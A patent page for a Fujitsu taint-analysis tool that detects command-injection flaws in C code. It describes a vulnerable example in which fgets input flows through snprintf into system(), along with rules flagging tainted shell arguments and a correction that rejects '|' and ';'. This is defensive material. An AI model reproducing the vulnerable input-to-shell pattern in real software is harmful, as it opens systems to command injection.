  • The fgets function is used such that an externally input value is placed in a first argument, so that this definition means that the first argument is “taint” and arguments other than the first argument and return values are “non-tainted”.
  • Further, with regard to snprintf function, definition is made as follows.
  • snprintf:param 1=param 4
  • This definition means that the attribute of a first argument inherits the attribute of a fourth argument in snprintf function. That is, if the fourth argument is “taint”, the first attribute is “taint”, and if the fourth argument is “non-tainted”, the first attribute is “non-tainted”.
  • Further, with regard to system function, definition is made as follows.
  • system:alert_if param1=taint
  • This definition means that when a first argument is “taint” in the system function, an alert message is generated. That is, when the first argument is “taint”, this function is likely to exhibit abnormal behavior, that is, this function has vulnerability.
  • In step S31, check is made to determine whether the attribute of a variable has been checked or not. For example, when a check function such as isalnumo is called with a target variable set as an argument, the attribute of the target variable becomes “checked”. Further, when a target variable is used in a conditional expression containing a comparison operator, the attribute of the target variable becomes “checked”.
  • In step S44, an alert message concerning vulnerability is generated and output to a screen or file. FIG. 7 is a view showing an example of an alert message according to the present invention. First, detection number, function name, and location of argument are output as the alert message. Descriptions about vulnerability such as function name, degree of risk, threat, comment are previously defined in the determination rule and are associated with the ID of the detected vulnerability. The location at which the tainted data has been set is stored in the variable table, and set function name, file name, line number and the like are output therefrom. The location at which a vulnerable library is used can be acquired from the current position of the flow tracing, and used function name, file name line number and the like are output therefrom.
  • Next, concrete operations performed in the cases where the vulnerability check apparatus according to the present invention performs vulnerable check for a vulnerable program and for a secure program will be described.
  • A case where the vulnerability check apparatus performs vulnerability check for a vulnerable program “test1.c” will first be described.
  • Since fgets function is used in 10th line, the vulnerability check apparatus determines that it is likely that a value has externally been input to a variable file_name and that the attribute of the variable file_name is “taint”.
  • Then, since snprintf function is used in 13th line, the vulnerability check apparatus determines that it is likely that the attribute of the variable file_name is passed to the variable is_command and that the attribute of the variable Is_command is “taint”.
  • Then, since a variable Is-command is used as an argument of system function in 14th line, the vulnerability check apparatus determines that it is likely that the system function processes a tainted variable and that vulnerability is generated. Then, the vulnerability check apparatus outputs an alert message to warn a programmer or the like of the detected vulnerability.
  • A case where the vulnerability check apparatus performs vulnerability check for a secure program “test2.c” will next be described.
  • Since fgets function is used in 10th line, the vulnerability check apparatus determines that a value has externally been input to a variable file_name and that the attribute of the variable file_name is “taint”.
  • Then, the vulnerability check apparatus determines that the value of the variable file_name has been checked by a function Check_file_name in 13th line and that the attaribute of the variable file_name is “checked”.
  • Then, since snprintf function is used in 18th line, the vulnerability check apparatus determines that the attribute of variable file_name has been passed to variable Is_command and that the attribute of variable Is_command is “checked”.
  • Then, since variable Is_command is used as an argument of system function in 19th line, the vulnerability check apparatus determines that system function processes a variable having a “checked” attribute, that is, determines that it is unlikely that vulnerability is generated.
  • Although one alert message is output for one variable in the present embodiment, a plurality of alert messages for the same variable may be merged.
  • There is often a case where a process in a program diverges due to appearance of if statement and different processing may be applied to the same variable in the branch locations. In this case, there may be a case where vulnerability that is likely to pose a serious risk is detected in one branch location and vulnerability rated low risk is detected in the other branch location. To separately output alert messages for both the cases is redundant for a user and, therefore, it is often preferable that the alert messages be merged. As an example of a method of merging the alert messages, there is one that uses an alert message of the highest severity and discards the other alert messages.
  • Although vulnerability check is performed by processing the source code in the present embodiment, it may be performed by processing an intermediate language file. In the case of a program coded in C-language, the source code readable by humans is compiled and translated into a computer-executable machine language. A compiler generates an intermediate language file which is an intermediate file in the above translation process and can output the file onto a disk. The intermediate language file is one that represents the source code in the form of nodes unit by unit. The intermediate code is inferior in human readability than source code, but not more difficult in decoding than machine language. FIG. 8 is a view showing an example of the intermediate language file. In the case where such intermediate language is read in, the vulnerability check apparatus generates a data flow in the form of a tree structure. Although data form is different, processing of vulnerability check can be performed in a manner similar to the case of source code.
  • Further, although the vulnerability check apparatus outputs an alert message so as to allow a user to correct a program according to the alert message in the present embodiment, a program correction method may be contained in the alert message, or a newly provided correction output section may automatically correct a program according to the correction method. FIG. 9 is a block diagram showing another example of a configuration of the vulnerability check apparatus according to the present invention. In FIG. 9, the same reference numerals as those in FIG. 4 denote the same or corresponding parts as those in FIG. 4, and the descriptions thereof will be omitted here. The apparatus shown in FIG. 9 differs from that of FIG. 4 in the point that a correction output section 51 is provided in place of the alert output section 41 so as to automatically correct a program.
  • In order to acquire a program correction method as described above, a program correction method for vulnerability may previously be defined in the determination rule. For example, one field is added to the determination rule concerning system function, and the type of the program correction method is described in the field as follows.
  • system: alert_if param1=taint, correct=method3
  • Further, the content of the program correction method3 is previously defined in the determination rule. FIG. 10 is source code showing an example of the content of a program correction method according to the present invention. This program correction method3 inserts, immediately before using system function, logic for checking a string variable used as an argument of the system function. This logic checks whether a character, such as “|” or “;”, that may pose a danger if it is passed to shell is contained in the string variable. Invalid_String_Error(x) in FIG. 10 is a function defined in a different location and terminates a program by outputting an error.
  • Further, although the present embodiment is applied to C-language, it can be applied to another program language.
  • Further, it is possible to provide a program that allows a computer constituting the vulnerability check apparatus to execute the above steps as a vulnerability check program. By storing the above program in a computer-readable storage medium, it is possible to allow the computer constituting the vulnerability check apparatus to execute the program. The computer-readable medium mentioned here includes: a portable storage medium such as a CD-ROM, a flexible disk, a DVD disk, a magneto-optical disk, or an IC card; a database that holds computer program; another computer and database thereof; and a transmission medium on a network line.
    • INDUSTRIAL APPLICABILITY
  • According to the present invention, by detecting only the location at which a vulnerable library is not appropriately used, accuracy of vulnerability detection is significantly improved as compared to the conventional method that detects all vulnerable libraries.

Claims (16)

1. A vulnerability check program allowing a computer to execute a vulnerability check method that detects vulnerability of a program to be checked, the program allowing the computer to execute:
a determination rule management step that manages a determination rule concerning vulnerability;
a program input step that reads in the program to be checked;
a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable;
a variable management step that manages the information concerning the variable;
a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and
an alert output step that outputs an alert message concerning the vulnerability detected by the vulnerability determination step.
2. The vulnerability check program according to claim 1, wherein the determination rule includes a definition of a vulnerable argument in a library function.
3. The vulnerability check program according to claim 1, wherein the variable managed by the variable management step includes the variable whose value is externally input and a variable obtained by processing the variable whose value is externally input by a function and the like.
4. The vulnerability check program according to claim 1, wherein the information concerning a variable includes information indicating whether the value of the variable is externally input or not and information indicating whether vulnerability check has been made for the externally input value or not.
5. The vulnerability check program according to claim 1, wherein the alert message includes any of the location of the variable whose value is externally input, library function and argument that have been used, description about detected vulnerability, and correction method of the program to be checked.
6. The vulnerability check program according to claim 1, wherein the program to be checked is source code or an intermediate language file.
7. A vulnerability check program allowing a computer to execute a vulnerability check method that detects vulnerability of a program to be checked, the program allowing the computer to execute:
a determination rule management step that manages a determination rule concerning vulnerability;
a program input step that reads in the program to be checked;
a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable;
a variable management step that manages the information concerning the variable;
a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and
a correction output step that corrects the program to be checked with respect to the vulnerability determined by the vulnerability determination step.
8. A vulnerability check apparatus that detects vulnerability of a program to be checked, comprising:
a determination rule management section that manages a determination rule concerning vulnerability;
a program input section that reads in the program to be checked;
a processing flow trace section that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable;
a variable management section that manages the information concerning the variable;
a vulnerability determination section that uses the determination rule and information concerning the variable to make determination of vulnerability; and
an alert output section that outputs an alert message concerning the vulnerability detected by the vulnerability determination section.
9. The vulnerability check apparatus according to claim 8, wherein the determination rule includes a definition of a vulnerable argument in a library function.
10. The vulnerability check apparatus according to claim 8, wherein the variable managed by the variable management section includes the variable whose value is externally input and a variable obtained by processing the variable whose value is externally input by a function and the like.
11. The vulnerability check apparatus according to claim 8, wherein
the information concerning a variable includes information indicating whether the value of the variable is externally input or not and information indicating whether vulnerability check has been made for the externally input value or not.
12. The vulnerability check apparatus according to claim 8, wherein the alert message includes any of the location of the variable whose value is externally input, library function and argument that have been used, description about detected vulnerability, and correction method of the program to be checked.
13. The vulnerability check apparatus according to claim 8, wherein the program to be checked is source code or an intermediate language file.
14. A vulnerability check apparatus that detects vulnerability of a program to be checked, comprising:
a determination rule management section that manages a determination rule concerning vulnerability;
a program input section that reads in the program to be checked;
a processing flow trace section that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable;
a variable management section that manages the information concerning the variable;
a vulnerability determination section that uses the determination rule and information concerning the variable to make determination of vulnerability; and
a correction output section that corrects the program to be checked with respect to the vulnerability determined by the vulnerability determination section.
15. A vulnerability check method that detects vulnerability of a program to be checked, comprising:
a determination rule management step that manages a determination rule concerning vulnerability;
a program input step that reads in the program to be checked;
a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable;
a variable management step that manages the information concerning the variable;
a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and
an alert output step that outputs an alert message concerning the vulnerability detected by the vulnerability determination step.
16. A vulnerability check method that detects vulnerability of a program to be checked, comprising:
a determination rule management step that manages a determination rule concerning vulnerability;
a program input step that reads in the program to be checked;
a processing flow trace step that traces the processing flow of the program to be checked with respect to a variable whose value is externally input to acquire information concerning the variable;
a variable management step that manages the information concerning the variable;
a vulnerability determination step that uses the determination rule and information concerning the variable to make determination of vulnerability; and
a correction output step that corrects the program to be checked with respect to the vulnerability determined by the vulnerability determination step.
US11/832,779 2005-02-17 2007-08-02 Vulnerability check program, vulnerability check apparatus, and vulnerability check method Abandoned US20070271617A1 (en)

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
PCT/JP2005/002422 WO2006087780A1 (en) 2005-02-17 2005-02-17 Vulnerability examining program, vulnerability examining device, and vulnerability examining method

Related Parent Applications (1)

Application Number Title Priority Date Filing Date
PCT/JP2005/002422 Continuation WO2006087780A1 (en) 2005-02-17 2005-02-17 Vulnerability examining program, vulnerability examining device, and vulnerability examining method

Publications (1)

Publication Number Publication Date
US20070271617A1 true US20070271617A1 (en) 2007-11-22

Family

ID=36916196

Family Applications (1)

Application Number Title Priority Date Filing Date
US11/832,779 Abandoned US20070271617A1 (en) 2005-02-17 2007-08-02 Vulnerability check program, vulnerability check apparatus, and vulnerability check method

Country Status (3)

Country Link
US (1) US20070271617A1 (en)
JP (1) JPWO2006087780A1 (en)
WO (1) WO2006087780A1 (en)

Cited By (16)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20060277604A1 (en) * 2005-05-20 2006-12-07 Microsoft Corporation System and method for distinguishing safe and potentially unsafe data during runtime processing
US20100131721A1 (en) * 2008-11-21 2010-05-27 Richard Title Managing memory to support large-scale interprocedural static analysis for security problems
US20110055813A1 (en) * 2009-09-03 2011-03-03 Inaternational Business Machines Corporation Black Box Testing Optimization Using Information from White Box Testing
US7958558B1 (en) * 2006-05-18 2011-06-07 Vmware, Inc. Computational system including mechanisms for tracking propagation of information with aging
US8561134B2 (en) * 2004-09-03 2013-10-15 Colorado Remediation Technologies, Llc Policy-based selection of remediation
US8819637B2 (en) 2010-06-03 2014-08-26 International Business Machines Corporation Fixing security vulnerability in a source code
CN104508672A (en) * 2012-08-01 2015-04-08 三菱电机株式会社 Program execution device and program analysis device
CN104508677A (en) * 2012-07-31 2015-04-08 惠普发展公司,有限责任合伙企业 Conjoint vulnerability identifiers
US20150207811A1 (en) * 2012-07-31 2015-07-23 Hewlett-Packard Development Company, L.P. Vulnerability vector information analysis
US20160110189A1 (en) * 2014-10-16 2016-04-21 International Business Machines Corporation Parallel development of diverged source streams
US20170169229A1 (en) * 2015-12-10 2017-06-15 Sap Se Vulnerability analysis of software components
CN106940772A (en) * 2016-01-05 2017-07-11 阿里巴巴集团控股有限公司 The tracking and device of variable object
CN113010899A (en) * 2021-04-16 2021-06-22 上海交通大学 PHP deserialization vulnerability exploitation chain detection method
JP7331679B2 (en) 2018-12-21 2023-08-23 富士通株式会社 Determining Information Leakage in Computer Readable Programs
US11895138B1 (en) * 2015-02-02 2024-02-06 F5, Inc. Methods for improving web scanner accuracy and devices thereof
JP7433510B2 (en) 2020-07-02 2024-02-19 ミツビシ・エレクトリック・アールアンドディー・センター・ヨーロッパ・ビーヴィ Methods, storage media, computer programs, and processing circuits for verifying implementation of security policies

Families Citing this family (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
JP4693044B2 (en) * 2005-08-18 2011-06-01 株式会社日立ソリューションズ Source code vulnerability inspection device
US7991902B2 (en) * 2006-12-08 2011-08-02 Microsoft Corporation Reputation-based authorization decisions
JP5176478B2 (en) * 2007-10-22 2013-04-03 富士通株式会社 Data flow analysis device, data flow analysis method, and data flow analysis program
US8914890B2 (en) * 2011-01-31 2014-12-16 International Business Machines Corporation Determining the vulnerability of computer software applications to privilege-escalation attacks
JP7068752B2 (en) * 2018-03-22 2022-05-17 三菱電機株式会社 Source code analyzer and source code analysis program
CN110399725A (en) * 2019-06-18 2019-11-01 深圳壹账通智能科技有限公司 Loophole processing method and processing device, electronic equipment and computer readable storage medium
WO2020261430A1 (en) * 2019-06-26 2020-12-30 三菱電機株式会社 Information processing device, information processing method, and information processing program

Citations (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20040260940A1 (en) * 2003-04-18 2004-12-23 Ounce Labs, Inc. Method and system for detecting vulnerabilities in source code
US20050097535A1 (en) * 2003-09-15 2005-05-05 Plum Thomas S. Automated safe secure techniques for eliminating undefined behavior in computer software
US6978441B2 (en) * 2001-10-03 2005-12-20 Sun Microsystems, Inc. Rating apparatus and method for evaluating bugs
US20060080578A1 (en) * 2004-10-07 2006-04-13 Microsoft Corporation Defect detection for integers
US7392545B1 (en) * 2002-01-18 2008-06-24 Cigital, Inc. Systems and methods for detecting software security vulnerabilities

Patent Citations (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US6978441B2 (en) * 2001-10-03 2005-12-20 Sun Microsystems, Inc. Rating apparatus and method for evaluating bugs
US7392545B1 (en) * 2002-01-18 2008-06-24 Cigital, Inc. Systems and methods for detecting software security vulnerabilities
US20040260940A1 (en) * 2003-04-18 2004-12-23 Ounce Labs, Inc. Method and system for detecting vulnerabilities in source code
US20050097535A1 (en) * 2003-09-15 2005-05-05 Plum Thomas S. Automated safe secure techniques for eliminating undefined behavior in computer software
US20060080578A1 (en) * 2004-10-07 2006-04-13 Microsoft Corporation Defect detection for integers

Non-Patent Citations (3)

* Cited by examiner, † Cited by third party
Title
Bush, W. et al, "A Static Analyzer for Finding Dynamic Programming Errors," Software-Practice and Experience, 2000, vol. 30, Issue 7, pp 775-802. *
Ganapathy, Vinod et al. "Buffer Overrun Detection using Linear Programming and Static Analysis," 2003, UW-Madison Comp. Sci. Tech. Report 1488. *
George C. Necula and Peter Lee. "The Design and Implementation of a Certifying Compiler," In Keith D. Cooper, editor, Proceedings of the Conference on Programming Language Design and Implementation (PLDI'98), pages 333-344, MOntreal, Canada, June 1998. ACM Press. *

Cited By (31)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US9602550B2 (en) 2004-09-03 2017-03-21 Fortinet, Inc. Policy-based selection of remediation
US9154523B2 (en) 2004-09-03 2015-10-06 Fortinet, Inc. Policy-based selection of remediation
US9392024B2 (en) 2004-09-03 2016-07-12 Fortinet, Inc. Policy-based selection of remediation
US8561134B2 (en) * 2004-09-03 2013-10-15 Colorado Remediation Technologies, Llc Policy-based selection of remediation
US20060277604A1 (en) * 2005-05-20 2006-12-07 Microsoft Corporation System and method for distinguishing safe and potentially unsafe data during runtime processing
US7757282B2 (en) * 2005-05-20 2010-07-13 Microsoft Corporation System and method for distinguishing safe and potentially unsafe data during runtime processing
US7958558B1 (en) * 2006-05-18 2011-06-07 Vmware, Inc. Computational system including mechanisms for tracking propagation of information with aging
US20100131721A1 (en) * 2008-11-21 2010-05-27 Richard Title Managing memory to support large-scale interprocedural static analysis for security problems
US8429633B2 (en) * 2008-11-21 2013-04-23 International Business Machines Corporation Managing memory to support large-scale interprocedural static analysis for security problems
US8387017B2 (en) * 2009-09-03 2013-02-26 International Business Machines Corporation Black box testing optimization using information from white box testing
US20110055813A1 (en) * 2009-09-03 2011-03-03 Inaternational Business Machines Corporation Black Box Testing Optimization Using Information from White Box Testing
US8819637B2 (en) 2010-06-03 2014-08-26 International Business Machines Corporation Fixing security vulnerability in a source code
US9298924B2 (en) 2010-06-03 2016-03-29 International Business Machines Corporation Fixing security vulnerability in a source code
CN104508677A (en) * 2012-07-31 2015-04-08 惠普发展公司,有限责任合伙企业 Conjoint vulnerability identifiers
US20150207811A1 (en) * 2012-07-31 2015-07-23 Hewlett-Packard Development Company, L.P. Vulnerability vector information analysis
US20150213272A1 (en) * 2012-07-31 2015-07-30 Hewlett-Packard Developement Company, L.P. Conjoint vulnerability identifiers
CN104508672A (en) * 2012-08-01 2015-04-08 三菱电机株式会社 Program execution device and program analysis device
US20150302191A1 (en) * 2012-08-01 2015-10-22 Mitsubishi Electric Corporation Program execution apparatus and program analysis apparatus
EP2881877A4 (en) * 2012-08-01 2016-08-03 Mitsubishi Electric Corp Program execution device and program analysis device
US9507933B2 (en) * 2012-08-01 2016-11-29 Mitsubishi Electric Corporation Program execution apparatus and program analysis apparatus
US20160110187A1 (en) * 2014-10-16 2016-04-21 International Business Machines Corporation Parallel development of diverged source streams
US10310848B2 (en) * 2014-10-16 2019-06-04 International Business Machines Corporation Parallel development of diverged source streams
US20160110189A1 (en) * 2014-10-16 2016-04-21 International Business Machines Corporation Parallel development of diverged source streams
US10169032B2 (en) * 2014-10-16 2019-01-01 International Business Machines Corporation Parallel development of diverged source streams
US11895138B1 (en) * 2015-02-02 2024-02-06 F5, Inc. Methods for improving web scanner accuracy and devices thereof
US20170169229A1 (en) * 2015-12-10 2017-06-15 Sap Se Vulnerability analysis of software components
US10691808B2 (en) * 2015-12-10 2020-06-23 Sap Se Vulnerability analysis of software components
CN106940772A (en) * 2016-01-05 2017-07-11 阿里巴巴集团控股有限公司 The tracking and device of variable object
JP7331679B2 (en) 2018-12-21 2023-08-23 富士通株式会社 Determining Information Leakage in Computer Readable Programs
JP7433510B2 (en) 2020-07-02 2024-02-19 ミツビシ・エレクトリック・アールアンドディー・センター・ヨーロッパ・ビーヴィ Methods, storage media, computer programs, and processing circuits for verifying implementation of security policies
CN113010899A (en) * 2021-04-16 2021-06-22 上海交通大学 PHP deserialization vulnerability exploitation chain detection method

Also Published As

Publication number Publication date
JPWO2006087780A1 (en) 2008-07-03
WO2006087780A1 (en) 2006-08-24

Similar Documents

Publication Publication Date Title
US20070271617A1 (en) Vulnerability check program, vulnerability check apparatus, and vulnerability check method
JP7164017B2 (en) Systems and methods for optimizing control flow graphs for functional safety using fault tree analysis
Wassermann et al. Sound and precise analysis of web applications for injection vulnerabilities
JP4902129B2 (en) Method and system for enforcing a security policy via a security virtual machine
US8635602B2 (en) Verification of information-flow downgraders
Doupe et al. deDacota: toward preventing server-side XSS via automatic code and data separation
US8572747B2 (en) Policy-driven detection and verification of methods such as sanitizers and validators
Backes et al. R-droid: Leveraging android app analysis with static slice optimization
US20120216177A1 (en) Generating Sound and Minimal Security Reports Based on Static Analysis of a Program
US11314863B2 (en) Behavioral threat detection definition and compilation
US11663326B2 (en) Behavioral threat detection definition and compilation
EP3495978A1 (en) Method for detecting vulnerabilities in software
US20170185784A1 (en) Point-wise protection of application using runtime agent
US20210004470A1 (en) Automatic Generation Of Patches For Security Violations
JP5077455B2 (en) Vulnerability audit program, vulnerability audit device, vulnerability audit method
Grabowski et al. Type-based enforcement of secure programming guidelines—code injection prevention at SAP
CN115774865A (en) Front-end code operation method and device, electronic equipment and storage medium
Zhioua et al. Formal specification and verification of security guidelines
Le Guernic Precise Dynamic Verification of Confidentiality.
Zhioua et al. Framework for the formal specification and verification of security guidelines
CN111027073B (en) Vulnerability detection method, device, equipment and storage medium
KR100562149B1 (en) Method for detecting vulnerability buffer-overflow
CN116361748B (en) Software supply chain safety detection method and device
KR102026959B1 (en) Security system and operation method thereof
Hamlen et al. Chekov: Aspect-oriented runtime monitor certification via model-checking (extended version)

Legal Events

Date Code Title Description
AS Assignment

Owner name: FUJITSU LIMITED, JAPAN

Free format text: ASSIGNMENT OF ASSIGNORS INTEREST;ASSIGNORS:TORII, SATORU;MITOMO, MASASHI;REEL/FRAME:019637/0619;SIGNING DATES FROM 20070704 TO 20070706

AS Assignment

Owner name: FUJITSU LIMITED, JAPAN

Free format text: RECORD TO CORRECT THE ASSIGNEE'S ADDRESS. CORRECT ADDRESS IS 1-1, KAMIKODANAKA 4-CHOME NAKAHARA-KU KAWASAKI-SHI KANAGAWA 211-8588 JAPAN RECORDED ON 019637/0619;ASSIGNORS:MITOMO, MASASHI;TORII, SATORU;REEL/FRAME:020114/0689;SIGNING DATES FROM 20070704 TO 20070706

STCB Information on status: application discontinuation

Free format text: ABANDONED -- FAILURE TO RESPOND TO AN OFFICE ACTION